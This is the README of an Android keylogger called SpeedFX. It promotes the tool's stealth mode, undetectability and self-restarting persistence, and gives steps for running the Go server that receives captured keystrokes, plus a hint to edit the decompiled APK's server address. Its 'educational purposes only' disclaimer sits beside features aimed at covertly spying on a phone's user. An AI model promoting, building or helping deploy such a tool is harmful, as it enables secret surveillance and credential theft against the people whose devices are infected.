Key Features of SpeedFX: Visit for support
-
Real-Time Key Logs: SpeedFX android keylogger sends key logs in real-time, allowing you to monitor activity seamlessly.
-
Stealth Mode: Once installed, the SpeedFX APK hides itself, making it virtually Undetectable.
-
Auto Restart: SpeedFX automatically restarts if it is closed or the device reboots.
-
Never Dies: Engineered for persistence, SpeedFX run anyway.
-
Suported OS- Linux, Windows, Termux
This repository contains a simple keylogger for Android devices developed in Go. It captures keyboard input and sends it to a server for analysis. Below are instructions for installing Go on both Windows and Termux, as well as running the Go server.
Decompile apk Look for smali 0.0.0.0:8080
- Open your web browser and search for "install Go language on Windows".
- Follow the official installation instructions provided on the Go website.
- Open the command prompt (cmd).
- Navigate to the directory where the server code is located.
- Run the server using the command:
go run server.go
- Open Termux on your Android device.
- Install Go by running the following command:
pkg install golang
- After installing Go, navigate to the directory where the server code is located.
- Run the server using the command:
go run server.go
- Now the server is running and ready to receive data from the Android keylogger.
This keylogger is intended for educational purposes only. Please use it responsibly and only on devices that you own or have explicit permission to monitor.
SpeedFX is intended for educational purposes only. It is designed to help students understand the mechanics of keyloggers and the importance of cybersecurity. Unauthorized use of keyloggers can violate privacy laws and ethical standards.